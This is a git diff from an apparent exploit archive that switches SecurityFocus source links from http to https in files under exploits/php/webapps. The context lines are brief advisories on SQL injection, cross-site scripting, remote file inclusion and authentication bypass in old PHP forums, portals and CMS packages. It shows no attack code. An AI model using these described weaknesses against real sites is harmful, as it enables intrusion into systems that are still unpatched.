a/exploits/php/webapps/21065.pl b/exploits/php/webapps/21065.pl index 68e5ab44c..f6543e9cd 100755 --- a/exploits/php/webapps/21065.pl +++ b/exploits/php/webapps/21065.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3167/info +source: https://www.securityfocus.com/bid/3167/info An input validation error exists in phpBB, a freely available WWW forums package. diff --git a/exploits/php/webapps/21119.txt b/exploits/php/webapps/21119.txt index 05ca9cf42..a3ea7f24c 100644 --- a/exploits/php/webapps/21119.txt +++ b/exploits/php/webapps/21119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3435/info +source: https://www.securityfocus.com/bid/3435/info PostNuke, successor to PHPNuke, is a content management system written in PHP. PostNuke versions 0.62 to 0.64 suffer from a vulnerability that allows a remote user to log-in as any user with known username and ID without authentication. The problem lies in a failure to filter inappropriate characters from variables that can be passed to the program's components by a remote attacker. This allows the attacker to alter a mysql query to the user database, bypassing password checking and assuming the identity of a specified user. diff --git a/exploits/php/webapps/21157.txt b/exploits/php/webapps/21157.txt index 9c057127b..8b9beee41 100644 --- a/exploits/php/webapps/21157.txt +++ b/exploits/php/webapps/21157.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3554/info +source: https://www.securityfocus.com/bid/3554/info Bharat Mediratta Gallery is a free, open source web-based photo album which may be used as an add-on for the PHPNuke web portal. diff --git a/exploits/php/webapps/21165.txt b/exploits/php/webapps/21165.txt index 106aa4060..b9e1dde80 100644 --- a/exploits/php/webapps/21165.txt +++ b/exploits/php/webapps/21165.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3609/info +source: https://www.securityfocus.com/bid/3609/info PHPNuke is a website creation/maintenance tool. diff --git a/exploits/php/webapps/21166.txt b/exploits/php/webapps/21166.txt index b685c8a21..aba2005d2 100644 --- a/exploits/php/webapps/21166.txt +++ b/exploits/php/webapps/21166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3609/info +source: https://www.securityfocus.com/bid/3609/info PHPNuke is a website creation/maintenance tool. diff --git a/exploits/php/webapps/21168.txt b/exploits/php/webapps/21168.txt index d1be2f472..c0af091cf 100644 --- a/exploits/php/webapps/21168.txt +++ b/exploits/php/webapps/21168.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3643/info +source: https://www.securityfocus.com/bid/3643/info EasyNews is a free, open-source script for displaying news stories on a website. diff --git a/exploits/php/webapps/21206.txt b/exploits/php/webapps/21206.txt index 0219e59a2..4ef06ce38 100644 --- a/exploits/php/webapps/21206.txt +++ b/exploits/php/webapps/21206.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3807/info +source: https://www.securityfocus.com/bid/3807/info phptonuke.php is a PHPNuke AddOn script to insert a PHP script into the middle of a PHPNuke site. It is written and maintained by Lebios. diff --git a/exploits/php/webapps/21230.txt b/exploits/php/webapps/21230.txt index 483b371f0..a42db4f56 100644 --- a/exploits/php/webapps/21230.txt +++ b/exploits/php/webapps/21230.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3889/info +source: https://www.securityfocus.com/bid/3889/info PHPNuke is a website creation/maintenance tool. diff --git a/exploits/php/webapps/21233.txt b/exploits/php/webapps/21233.txt index 64b9316b3..32d79184c 100644 --- a/exploits/php/webapps/21233.txt +++ b/exploits/php/webapps/21233.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3906/info +source: https://www.securityfocus.com/bid/3906/info PHPNuke is a website creation/maintenance tool. It is can be back-ended by a number of database products such as MySQL, PostgreSQL, mSQL, Interbase, Sybase, etc. diff --git a/exploits/php/webapps/21241.txt b/exploits/php/webapps/21241.txt index 71baf4d68..39dce1f55 100644 --- a/exploits/php/webapps/21241.txt +++ b/exploits/php/webapps/21241.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/3946/info +source: https://www.securityfocus.com/bid/3946/info WikkiTikkiTavi is a freely available engine for running a Wiki site. Wiki sites are web communities which are based on the idea that every webpage is editable by users of the website. WikkiTikkiTavi is back-ended by a MySQL database and runs on most Linux and Unix variants, as well as Microsoft Windows NT/2000 operating systems. diff --git a/exploits/php/webapps/21277.txt b/exploits/php/webapps/21277.txt index a2e5f01b0..72eff88b6 100644 --- a/exploits/php/webapps/21277.txt +++ b/exploits/php/webapps/21277.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4038/info +source: https://www.securityfocus.com/bid/4038/info Portix-PHP is freely available web portal software. It is written in PHP and will run on most Unix and Linux variants. diff --git a/exploits/php/webapps/21278.txt b/exploits/php/webapps/21278.txt index b83ddd6ab..a8d3d04b9 100644 --- a/exploits/php/webapps/21278.txt +++ b/exploits/php/webapps/21278.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4039/info +source: https://www.securityfocus.com/bid/4039/info Portix-PHP is freely available web portal software. It is written in PHP and will run on most Unix and Linux variants. diff --git a/exploits/php/webapps/21279.txt b/exploits/php/webapps/21279.txt index c88b992b5..e2f6951c6 100644 --- a/exploits/php/webapps/21279.txt +++ b/exploits/php/webapps/21279.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4041/info +source: https://www.securityfocus.com/bid/4041/info Portix-PHP is freely available web portal software. It is written in PHP and will run on most Unix and Linux variants. diff --git a/exploits/php/webapps/21299.txt b/exploits/php/webapps/21299.txt index 9a4303b77..a83e48c8e 100644 --- a/exploits/php/webapps/21299.txt +++ b/exploits/php/webapps/21299.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4165/info +source: https://www.securityfocus.com/bid/4165/info Powie PForum is web forum software, written in PHP and back-ended by MySQL. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21300.txt b/exploits/php/webapps/21300.txt index fa5eb00fa..fc7b8047e 100644 --- a/exploits/php/webapps/21300.txt +++ b/exploits/php/webapps/21300.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4167/info +source: https://www.securityfocus.com/bid/4167/info The Extreme Message Board (XMB) 1.6 Magic Lantern pre-beta version reportedly allows JavaScript and HTML to be entered in messages. This can be achieved by entering script or HTML between [img] and [/img] tags in a forum message. diff --git a/exploits/php/webapps/21301.txt b/exploits/php/webapps/21301.txt index 2ae273822..25951e4ad 100644 --- a/exploits/php/webapps/21301.txt +++ b/exploits/php/webapps/21301.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4171/info +source: https://www.securityfocus.com/bid/4171/info OpenBB is web forum software written in PHP. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21304.txt b/exploits/php/webapps/21304.txt index 04aca687a..78403a67f 100644 --- a/exploits/php/webapps/21304.txt +++ b/exploits/php/webapps/21304.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4182/info +source: https://www.securityfocus.com/bid/4182/info Ikonboard is a Web Bulletin Board Service (BBS) software package written in Perl which runs on Unix and Linux variants. diff --git a/exploits/php/webapps/21312.txt b/exploits/php/webapps/21312.txt index 94fef442b..df931a660 100644 --- a/exploits/php/webapps/21312.txt +++ b/exploits/php/webapps/21312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4220/info +source: https://www.securityfocus.com/bid/4220/info ReBB is web forum software which will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. It is written in PHP and may be back-ended by a number of databases. diff --git a/exploits/php/webapps/21343.txt b/exploits/php/webapps/21343.txt index 1e48c341b..8f4a7fcec 100644 --- a/exploits/php/webapps/21343.txt +++ b/exploits/php/webapps/21343.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4284/info +source: https://www.securityfocus.com/bid/4284/info PHProjekt is a freely available, open source PHP Groupware package. It is actively maintained by the PHProjekt Development Team. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21349.txt b/exploits/php/webapps/21349.txt index 911106064..b680433be 100644 --- a/exploits/php/webapps/21349.txt +++ b/exploits/php/webapps/21349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4333/info +source: https://www.securityfocus.com/bid/4333/info PHP-Nuke is a popular web based Portal system. It allows users to create accounts and contribute content to the site. diff --git a/exploits/php/webapps/21357.txt b/exploits/php/webapps/21357.txt index d0ff39aea..3daa41a9a 100644 --- a/exploits/php/webapps/21357.txt +++ b/exploits/php/webapps/21357.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4381/info +source: https://www.securityfocus.com/bid/4381/info PostNuke is a content management system originally forked from the PHP-Nuke project. It is implemented in PHP, and available for Windows, Linux and other Unix based systems. diff --git a/exploits/php/webapps/21358.sh b/exploits/php/webapps/21358.sh index 3b7202501..f9b530c83 100755 --- a/exploits/php/webapps/21358.sh +++ b/exploits/php/webapps/21358.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4385/info +source: https://www.securityfocus.com/bid/4385/info SquirrelMail is a feature rich webmail program implemented in the PHP4 language. It is available for Linux and Unix based operating systems. SquirrelMail allows for extended functionality through a plugin system. diff --git a/exploits/php/webapps/21377.txt b/exploits/php/webapps/21377.txt index f1270e177..bfd752968 100644 --- a/exploits/php/webapps/21377.txt +++ b/exploits/php/webapps/21377.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4506/info +source: https://www.securityfocus.com/bid/4506/info SunShop is commercial web store software. It is written in PHP, and will run on most Unix and Linux operating systems as well as Microsoft Windows. diff --git a/exploits/php/webapps/21380.php b/exploits/php/webapps/21380.php index 584213124..3ccc8b504 100644 --- a/exploits/php/webapps/21380.php +++ b/exploits/php/webapps/21380.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4512/info +source: https://www.securityfocus.com/bid/4512/info Burning Board is web forum software. It is written in PHP, back-ended by MySQL, and will run on most Unix and Linux variants as well as Microsoft Windows. diff --git a/exploits/php/webapps/21381.txt b/exploits/php/webapps/21381.txt index 0b17fa567..72953ad07 100644 --- a/exploits/php/webapps/21381.txt +++ b/exploits/php/webapps/21381.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4513/info +source: https://www.securityfocus.com/bid/4513/info xGB is guestbook software. It is written in PHP and will run on most Unix and Linux variants as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21382.txt b/exploits/php/webapps/21382.txt index d83b48fb9..e3675b3cd 100644 --- a/exploits/php/webapps/21382.txt +++ b/exploits/php/webapps/21382.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4515/info +source: https://www.securityfocus.com/bid/4515/info xGB is guestbook software. It is written in PHP and will run on most Unix and Linux variants as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21383.txt b/exploits/php/webapps/21383.txt index 0051360b5..bc3e4a983 100644 --- a/exploits/php/webapps/21383.txt +++ b/exploits/php/webapps/21383.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4516/info +source: https://www.securityfocus.com/bid/4516/info xNewsletter is a script that allows web users to subscribe to a newsletter. It is written in PHP and will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21391.txt b/exploits/php/webapps/21391.txt index b35ffc3cd..7a04d5d18 100644 --- a/exploits/php/webapps/21391.txt +++ b/exploits/php/webapps/21391.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4540/info +source: https://www.securityfocus.com/bid/4540/info PVote is a web voting system written in PHP. It will run on most Unix and Linux variants as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21397.txt b/exploits/php/webapps/21397.txt index 323b86dd8..ebadf5957 100644 --- a/exploits/php/webapps/21397.txt +++ b/exploits/php/webapps/21397.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4541/info +source: https://www.securityfocus.com/bid/4541/info PVote is a web voting system written in PHP. It will run on most Unix and Linux variants as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21399.txt b/exploits/php/webapps/21399.txt index 5fbcc2e09..b9e943326 100644 --- a/exploits/php/webapps/21399.txt +++ b/exploits/php/webapps/21399.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4548/info +source: https://www.securityfocus.com/bid/4548/info IcrediBB is freely available web forum software. It is written in PHP and will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21401.txt b/exploits/php/webapps/21401.txt index 94cd48650..5b5c2cffc 100644 --- a/exploits/php/webapps/21401.txt +++ b/exploits/php/webapps/21401.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4559/info +source: https://www.securityfocus.com/bid/4559/info PostBoard is a freely available, open source message board module for the PostNuke content management system. It is designed for use on the Unix and Linux operating systems. diff --git a/exploits/php/webapps/21403.txt b/exploits/php/webapps/21403.txt index d730dc9c7..bf5255026 100644 --- a/exploits/php/webapps/21403.txt +++ b/exploits/php/webapps/21403.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4561/info +source: https://www.securityfocus.com/bid/4561/info PostBoard is a freely available, open source message board module for the PostNuke content management system. It is designed for use on the Unix and Linux operating systems. diff --git a/exploits/php/webapps/21421.txt b/exploits/php/webapps/21421.txt index 97f80311c..ff94acfd9 100644 --- a/exploits/php/webapps/21421.txt +++ b/exploits/php/webapps/21421.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4596/info +source: https://www.securityfocus.com/bid/4596/info PHProjekt is a freely available, open source PHP Groupware package. It is actively maintained by the PHPProjekt Development Team. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21423.txt b/exploits/php/webapps/21423.txt index d3a23238c..4936a6a94 100644 --- a/exploits/php/webapps/21423.txt +++ b/exploits/php/webapps/21423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4603/info +source: https://www.securityfocus.com/bid/4603/info Ultimate PHP Board (UPB) is web forum software. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21424.txt b/exploits/php/webapps/21424.txt index 7bac33b94..21c2925c2 100644 --- a/exploits/php/webapps/21424.txt +++ b/exploits/php/webapps/21424.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4615/info +source: https://www.securityfocus.com/bid/4615/info Admanager is banner advertisement management software. It is written in PHP and will run on most Unix and Linux variants, in addition to Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21425.txt b/exploits/php/webapps/21425.txt index e5280c2b0..4e349237a 100644 --- a/exploits/php/webapps/21425.txt +++ b/exploits/php/webapps/21425.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4617/info +source: https://www.securityfocus.com/bid/4617/info DNSTools is a web based managment tool for DNS information. It is implemented in PHP, and available for Linux and Solaris. diff --git a/exploits/php/webapps/21426.txt b/exploits/php/webapps/21426.txt index 27dffe949..8cb15e638 100644 --- a/exploits/php/webapps/21426.txt +++ b/exploits/php/webapps/21426.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4618/info +source: https://www.securityfocus.com/bid/4618/info Blahz-DNS is a web based management tool for DNS information. It is implemented in PHP, and available for Linux systems. diff --git a/exploits/php/webapps/21427.txt b/exploits/php/webapps/21427.txt index be7c0e395..822449768 100644 --- a/exploits/php/webapps/21427.txt +++ b/exploits/php/webapps/21427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4619/info +source: https://www.securityfocus.com/bid/4619/info MiniBB is web forum software. It is written in PHP and will run on most Unix and Linux variants as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21436.txt b/exploits/php/webapps/21436.txt index e8c4190f5..359eb4eb0 100644 --- a/exploits/php/webapps/21436.txt +++ b/exploits/php/webapps/21436.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4673/info +source: https://www.securityfocus.com/bid/4673/info B2 is a news/weblog tool written in php. b2 allows webmasters to quickly post news on the frontpage, and let viewers interact with each other. It is available primarily for Unix and Linux. diff --git a/exploits/php/webapps/21447.txt b/exploits/php/webapps/21447.txt index 0694fdf3d..bb3eabb98 100644 --- a/exploits/php/webapps/21447.txt +++ b/exploits/php/webapps/21447.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4721/info +source: https://www.securityfocus.com/bid/4721/info XMB Forum 1.6 Magic Lantern is a web-based discussion forum. It is vulnerable to a number of cross-site scripting issues because of improper filtering of user input. diff --git a/exploits/php/webapps/21448.txt b/exploits/php/webapps/21448.txt index 4c3623d33..b848a080d 100644 --- a/exploits/php/webapps/21448.txt +++ b/exploits/php/webapps/21448.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4722/info +source: https://www.securityfocus.com/bid/4722/info XMB Forum 1.6 Magic Lantern allows remote users to conduct activities in the forum while bypassing normal logging functions. This is accomplished by submitting an arbitrary string as the "analized" variable to index.php. Log information is written only if this variable is empty, so submitting a string to it bypassing the logging. diff --git a/exploits/php/webapps/21449.txt b/exploits/php/webapps/21449.txt index 3b3fdb1b4..f43b11e34 100644 --- a/exploits/php/webapps/21449.txt +++ b/exploits/php/webapps/21449.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4740/info +source: https://www.securityfocus.com/bid/4740/info NOCC is a web based email client implemented in PHP4. It includes support for POP3, SMTP and IMAP servers, MIME attachments and multiple languages. diff --git a/exploits/php/webapps/21454.txt b/exploits/php/webapps/21454.txt index c6922e80a..4bcf02eba 100644 --- a/exploits/php/webapps/21454.txt +++ b/exploits/php/webapps/21454.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4756/info +source: https://www.securityfocus.com/bid/4756/info Pseudo-frames is an application written in PHP and is maintained by Clicky Web. diff --git a/exploits/php/webapps/21459.txt b/exploits/php/webapps/21459.txt index ab43fb683..63a1d8549 100644 --- a/exploits/php/webapps/21459.txt +++ b/exploits/php/webapps/21459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4763/info +source: https://www.securityfocus.com/bid/4763/info Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21461.txt b/exploits/php/webapps/21461.txt index 62c6f4ae3..39c54360b 100644 --- a/exploits/php/webapps/21461.txt +++ b/exploits/php/webapps/21461.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4767/info +source: https://www.securityfocus.com/bid/4767/info Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21463.txt b/exploits/php/webapps/21463.txt index b975394a6..048f033bd 100644 --- a/exploits/php/webapps/21463.txt +++ b/exploits/php/webapps/21463.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4770/info +source: https://www.securityfocus.com/bid/4770/info mcNews is a set of scripts for allowing users to post news stories on a webpage. It will run on most Linux and Unix variants as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21474.txt b/exploits/php/webapps/21474.txt index 110b36920..d510f4250 100644 --- a/exploits/php/webapps/21474.txt +++ b/exploits/php/webapps/21474.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4819/info +source: https://www.securityfocus.com/bid/4819/info OpenBB is web forum software written in PHP. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21478.txt b/exploits/php/webapps/21478.txt index 9918ba472..07d5f4a78 100644 --- a/exploits/php/webapps/21478.txt +++ b/exploits/php/webapps/21478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4823/info +source: https://www.securityfocus.com/bid/4823/info OpenBB is web forum software written in PHP. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21479.txt b/exploits/php/webapps/21479.txt index 258a87e30..f8da0e046 100644 --- a/exploits/php/webapps/21479.txt +++ b/exploits/php/webapps/21479.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4824/info +source: https://www.securityfocus.com/bid/4824/info OpenBB is web forum software written in PHP. It will run on most Linux and Unix variants, in addition to Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21486.txt b/exploits/php/webapps/21486.txt index 4c60c322c..71936af56 100644 --- a/exploits/php/webapps/21486.txt +++ b/exploits/php/webapps/21486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4858/info +source: https://www.securityfocus.com/bid/4858/info It is possible to inject arbitrary HTML into phpBB2 forum messages via the use of BBCode image tags. A similar issue is described in Bugtraq ID 4379 "PHPBB Image Tag User-Embedded Scripting Vulnerability". However, phpBB2 was found to not be vulnerable to this previous issue. diff --git a/exploits/php/webapps/21509.txt b/exploits/php/webapps/21509.txt index a6d1f6d2a..d83b60974 100644 --- a/exploits/php/webapps/21509.txt +++ b/exploits/php/webapps/21509.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4924/info +source: https://www.securityfocus.com/bid/4924/info Teekai's Tracking Online does not adequately filter HTML tags from certain URL parameters, making it prone to cross-site scripting attacks. Attackers may exploit this by creating a malicious link to a vulnerable webpage. diff --git a/exploits/php/webapps/21514.txt b/exploits/php/webapps/21514.txt index c99289dbf..538c35766 100644 --- a/exploits/php/webapps/21514.txt +++ b/exploits/php/webapps/21514.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4953/info +source: https://www.securityfocus.com/bid/4953/info Splatt Forum does not filter HTML from image tags. This may allow an attacker to inject arbitrary script code in forum messages. Injected script code will be executed in the browser of an arbitrary web user who views the malicious forum message, in the context of the website running Splatt Forum. diff --git a/exploits/php/webapps/21517.txt b/exploits/php/webapps/21517.txt index 268d866ba..52622f87a 100644 --- a/exploits/php/webapps/21517.txt +++ b/exploits/php/webapps/21517.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4957/info +source: https://www.securityfocus.com/bid/4957/info It has been reported that multiple vulnerabilities exist in CBMS. Reportedly, it is possible to inject both JavaScript and SQL code into the system. It may be possible to execute script code within the context of the site as an authenticated administrator, or to view or modify sensitive database information through the subversion of an SQL query. diff --git a/exploits/php/webapps/21519.txt b/exploits/php/webapps/21519.txt index 7b6a98f86..d40c89a56 100644 --- a/exploits/php/webapps/21519.txt +++ b/exploits/php/webapps/21519.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4967/info +source: https://www.securityfocus.com/bid/4967/info It has been reported that MyHelpDesk is vulnerable to HTML injection attacks. diff --git a/exploits/php/webapps/21525.txt b/exploits/php/webapps/21525.txt index 1ba9d5c79..48781cc64 100644 --- a/exploits/php/webapps/21525.txt +++ b/exploits/php/webapps/21525.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4969/info +source: https://www.securityfocus.com/bid/4969/info Geeklog does not filter script code from URL parameters, making it prone to cross-site scripting attacks. Attacker-supplied script code may be included in a malicious link to the 'index.php' or 'comment.php' script. Such a malicious link might be included in a HTML e-mail or on a malicious webpage. diff --git a/exploits/php/webapps/21526.txt b/exploits/php/webapps/21526.txt index 25907435f..7fb16de5f 100644 --- a/exploits/php/webapps/21526.txt +++ b/exploits/php/webapps/21526.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4970/info +source: https://www.securityfocus.com/bid/4970/info It is reported that MyHelpDesk is vulnerable to cross-site scripting attacks. diff --git a/exploits/php/webapps/21527.txt b/exploits/php/webapps/21527.txt index d2f0f81d2..e35045c44 100644 --- a/exploits/php/webapps/21527.txt +++ b/exploits/php/webapps/21527.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4971/info +source: https://www.securityfocus.com/bid/4971/info It is reported that MyHelpDesk (version 20020509 and earlier) are vulnerable to SQL injection attacks. diff --git a/exploits/php/webapps/21528.txt b/exploits/php/webapps/21528.txt index 801968d71..5d475bcea 100644 --- a/exploits/php/webapps/21528.txt +++ b/exploits/php/webapps/21528.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4974/info +source: https://www.securityfocus.com/bid/4974/info Geeklog does not sufficiently sanitize script code from form fields, making it prone to script injection attacks. diff --git a/exploits/php/webapps/21529.txt b/exploits/php/webapps/21529.txt index 3bfae4507..1efbea48f 100644 --- a/exploits/php/webapps/21529.txt +++ b/exploits/php/webapps/21529.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/4977/info +source: https://www.securityfocus.com/bid/4977/info W-Agora is prone to an issue which may allow an attacker to include arbitrary files located on a remote server. In particular, the 'inc_dir' variable found in a number of the W-Agora scripts defines the path to the configuration file. It is possible, under some configurations, for an attacker to specify an arbitrary value for the location of the configuration file which points to a file on a remote server. diff --git a/exploits/php/webapps/21552.txt b/exploits/php/webapps/21552.txt index c1567623a..b41316381 100644 --- a/exploits/php/webapps/21552.txt +++ b/exploits/php/webapps/21552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5022/info +source: https://www.securityfocus.com/bid/5022/info PHP Classifieds has been reported to be prone to cross-site scripting attacks. Attackers may inject arbitrary HTML or script code into URI parameters in a malicious link. When the malicious link is visited, the attacker's script code will be executed in the web client of the user browsing the link, in the security context of the website hosting the vulnerable software. diff --git a/exploits/php/webapps/21557.txt b/exploits/php/webapps/21557.txt index 9dab890c7..54598ae41 100644 --- a/exploits/php/webapps/21557.txt +++ b/exploits/php/webapps/21557.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5028/info +source: https://www.securityfocus.com/bid/5028/info Zeroboard is a PHP web board package available for the Linux and Unix platforms. diff --git a/exploits/php/webapps/21563.txt b/exploits/php/webapps/21563.txt index b325878e7..af963fa7e 100644 --- a/exploits/php/webapps/21563.txt +++ b/exploits/php/webapps/21563.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5037/info +source: https://www.securityfocus.com/bid/5037/info osCommerce is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. diff --git a/exploits/php/webapps/21564.txt b/exploits/php/webapps/21564.txt index 2a7acf6d5..6d23abc98 100644 --- a/exploits/php/webapps/21564.txt +++ b/exploits/php/webapps/21564.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5039/info +source: https://www.securityfocus.com/bid/5039/info PHP-Address is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. diff --git a/exploits/php/webapps/21570.txt b/exploits/php/webapps/21570.txt index 92546b7f9..d4a8ba39f 100644 --- a/exploits/php/webapps/21570.txt +++ b/exploits/php/webapps/21570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5060/info +source: https://www.securityfocus.com/bid/5060/info BasiliX is a web-based mail application. It offers features such as mail attachments, address book, multiple language and theme support. diff --git a/exploits/php/webapps/21590.txt b/exploits/php/webapps/21590.txt index cd8909d1c..85af67fa8 100644 --- a/exploits/php/webapps/21590.txt +++ b/exploits/php/webapps/21590.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5141/info +source: https://www.securityfocus.com/bid/5141/info PhpAuction is a freely available web-based auction system. It is written using PHP scripting language on a MySQL database engine. diff --git a/exploits/php/webapps/21610.txt b/exploits/php/webapps/21610.txt index 3f0e80675..764d4fd8d 100644 --- a/exploits/php/webapps/21610.txt +++ b/exploits/php/webapps/21610.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5209/info +source: https://www.securityfocus.com/bid/5209/info Sun i-Runbook is a single point of technical and administration management for Sun production environments. i-Runbook provides a web interface. diff --git a/exploits/php/webapps/21622.txt b/exploits/php/webapps/21622.txt index 3be9dda9e..e4c4dcc08 100644 --- a/exploits/php/webapps/21622.txt +++ b/exploits/php/webapps/21622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5254/info +source: https://www.securityfocus.com/bid/5254/info PHP-Wiki does not sufficiently sanitize HTML from URI parameters, making it prone to cross-site scripting attacks. An attacker may exploit this condition by enticing users to visit a malicious link which contains attacker-supplied script code. diff --git a/exploits/php/webapps/21628.txt b/exploits/php/webapps/21628.txt index 80d7d5ed6..47e122056 100644 --- a/exploits/php/webapps/21628.txt +++ b/exploits/php/webapps/21628.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5270/info +source: https://www.securityfocus.com/bid/5270/info A cross site scripting vulnerability has been reported for Geeklog. Reportedly, Geeklog does not properly sanitize user supplied input before being included when posting comments or writing stories. diff --git a/exploits/php/webapps/21640.txt b/exploits/php/webapps/21640.txt index dd00924b8..f2a21030b 100644 --- a/exploits/php/webapps/21640.txt +++ b/exploits/php/webapps/21640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5297/info +source: https://www.securityfocus.com/bid/5297/info A vulnerability has been reported for Cobalt Qube that may allow an attacker to bypass the authentication mechanism and obtain administrative privileges. diff --git a/exploits/php/webapps/21660.txt b/exploits/php/webapps/21660.txt index fcb3e1a9d..77301e75e 100644 --- a/exploits/php/webapps/21660.txt +++ b/exploits/php/webapps/21660.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/5342/info +source: https://www.securityfocus.com/bid/5342/info phpBB2 is an open-source web forum application that is written in PHP and backended by a number of database products. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems. diff --git a/exploits/php/webapps/21661.txt b/exploits/php/webapps/21661.txt index 055030602..16fc7f218 100644 --- a/exploits/php/webapps/21661.txt +++ b/exploits/php/webapps/21661.txt 